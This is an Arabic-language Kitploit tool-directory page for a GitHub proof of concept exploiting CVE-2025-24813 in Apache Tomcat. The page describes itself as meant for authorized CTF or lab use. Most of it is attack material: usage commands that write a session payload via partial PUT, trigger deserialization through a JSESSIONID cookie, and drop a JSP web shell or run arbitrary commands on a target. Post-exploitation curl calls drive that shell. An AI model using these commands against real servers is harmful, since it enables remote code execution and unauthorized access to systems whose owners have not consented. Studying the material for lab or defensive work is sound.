Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-24813 — الحمولة الصحيحة لـ CVE في Java | Kitploit
أدوات/GitHubGitHub/loufa0/cve-2025-24813
ماسحات الثغرات الأمنيةالاستغلالأمن الويبCTFالتعلم والتعليممختبرات وتدريب عملي
GitHubloufa0/cve-2025-24813

CVE-2025-24813

الحمولة الصحيحة لـ CVE في Java

عرض المستودع
52منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-24813 Tomcat PoC

PoC لبيئة CTF/مختبر مصرح بها. يستغل ثغرة CVE-2025-24813 عبر الكتابة الجزئية لملف جلسة Tomcat باستخدام PUT، ثم يطلق إلغاء التسلسل باستخدام JSESSIONID.

المتطلبات الأساسية

  • Python 3
  • وحدة Python requests
  • Java JDK (java و javac)
  • الملف المرفق commons-collections-3.2.1.jar الموضوع في هذا المجلد

ysoserial غير مطلوب.

الملفات

  • poc_cve_2025_24813.py: غلاف Python يؤتمت التوليد والرفع والإطلاق.
  • GenerateTomcatSessionPayload.java: يولّد جلسة Tomcat صالحة تحتوي على gadget CommonsCollections.
  • commons-collections-3.2.1.jar: تبعية الـ gadget.
  • sh.jsp: شيل JSP اختياري يُنشر بواسطة --drop-shell.
  • الاستخدام

    ضع شيل JSP في جذر الويب الافتراضي /opt/tomcat/webapps/ROOT:

    root@kitploit:~
    ./poc_cve_2025_24813.py http://TARGET:8080 \
      --session-id poc24813 \
      --drop-shell \
      --shell-name sh.jsp
    

    تنفيذ أمر مباشر دون وضع شيل:

    root@kitploit:~
    ./poc_cve_2025_24813.py http://TARGET:8080 \
      --session-id cmd24813 \
      --cmd 'id > /opt/tomcat/webapps/ROOT/rce.txt'
    

    إذا كان جذر الويب مختلفًا:

    root@kitploit:~
    ./poc_cve_2025_24813.py http://TARGET:8080 \
      --drop-shell \
      --webroot /path/to/webroot \
      --shell-name sh.jsp
    

    إذا تم نقل ملف JAR، فحدد مساره:

    root@kitploit:~
    ./poc_cve_2025_24813.py http://TARGET:8080 \
      --jar /path/to/commons-collections-3.2.1.jar \
      --drop-shell
    

    بعد الاستغلال

    إذا نجح --drop-shell:

    root@kitploit:~
    curl --get --data-urlencode 'cmd=id' http://TARGET:8080/sh.jsp
    curl --get --data-urlencode 'cmd=cat /opt/tomcat/user.flg' http://TARGET:8080/sh.jsp
    

    الشروط على الجانب المستهدف

    • إصدار Tomcat معرّض للثغرة.
    • DefaultServlet قابل للكتابة، عادةً بإعداد readonly=false.
    • دعم PUT الجزئي.
    • جلسات مستمرة عبر PersistentManager و FileStore.
    • سلسلة gadget متاحة على الخادم، وهنا commons-collections.

    السلوك المتوقع أثناء الرفع غالبًا ما يكون HTTP 409 Conflict على:

    root@kitploit:~
    PUT /<session-id>/session
    Content-Range: bytes 0-1000/1200
    

    ثم يتم إطلاق إلغاء التسلسل باستخدام:

    root@kitploit:~
    Cookie: JSESSIONID=.<session-id>
    
    تنزيل الأداة